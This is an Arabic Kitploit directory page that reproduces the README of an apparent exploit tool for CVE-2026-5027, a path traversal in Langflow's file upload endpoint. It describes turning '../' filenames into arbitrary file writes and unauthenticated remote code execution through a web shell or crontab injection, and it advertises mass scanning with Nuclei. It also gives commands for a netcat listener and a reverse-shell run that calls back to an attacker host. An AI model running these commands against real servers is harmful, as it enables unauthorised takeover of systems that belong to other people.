Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-5027 — CVE-2026-5027 | Kitploit
أدوات/GitHubGitHub/0xblackash/cve-2026-5027
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHub0xblackash/cve-2026-5027

CVE-2026-5027

CVE-2026-5027

عرض المستودع
11منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔥 CVE-2026-5027 - اجتياز المسار في Langflow

ثغرة أمنية إلكترونية: استغلال اجتياز المسار

كتابة ملف اعتباطي إلى RCE
تنفيذ كود عن بُعد غير مصادق عليه عبر رفع الملفات

CVE CVSS Exploit

📌 نظرة عامة

يعاني Langflow من ثغرة اجتياز المسار خطيرة في نقطة رفع الملفات (POST /api/v2/files).

يمكن للمهاجم إرسال اسم ملف خبيث يحتوي على تسلسلات ../ لـ كتابة ملفات اعتباطية في أي مكان على نظام ملفات الخادم.

يؤدي هذا بسهولة إلى تنفيذ كود عن بُعد كامل (RCE) — على سبيل المثال عن طريق إسقاط شِل ويب أو الحقن في crontab.


🛠️ الميزات

  • ✅ استغلال غير مصادق (إعدادات تسجيل الدخول التلقائي الافتراضية)
  • ✅ إثبات مفهوم بسيط (يكتب ملف اختبار إلى /tmp)
  • ✅ شِل عكسي كامل عبر cron (لينكس)
  • ✅ قالب Nuclei مضمّن للمسح الجماعي
  • ✅ سهولة تخصيص عمق الاجتياز

🚀 بداية سريعة

1. إثبات المفهوم (اختبار آمن)

python3 CVE-2026-5027.py -t http://target:7860/ --proof

المخرجات المتوقعة في حالة وجود الثغرة:

[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt

2. شِل عكسي كامل

# ابدأ المستمع
nc -lvnp 4444

# شغّل الاستغلال
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444

📁 محتويات المستودع

الملفالوصف
CVE-2026-5027.pyالاستغلال الرئيسي بلغة بايثون (إثبات المفهوم + RCE)
CVE-2026-5027.yamlقالب Nuclei للمسح
README.mdهذا الملف

🎯 أمثلة الاستخدام

cve-2026-5027

وضع الإثبات

python3 CVE-2026-5027.py -t http://target.com/ --proof

وضع الشل العكسي

python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444

⚠️ إخلاء مسؤولية

هذا المستودع مخصص لأغراض الاختبارات الأمنية التعليمية والمرخصة فقط.

استخدمه بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها.


مصنوع بـ ❤️ لمجتمع الفريق الأحمر

تنزيل الأداة